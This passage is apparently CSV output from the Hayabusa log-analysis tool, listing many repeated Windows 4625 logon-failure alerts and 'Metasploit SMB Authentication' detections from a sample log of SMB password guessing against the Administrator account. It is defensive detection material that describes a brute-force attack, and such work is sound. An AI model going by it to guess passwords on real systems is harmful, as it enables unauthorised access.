SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: 
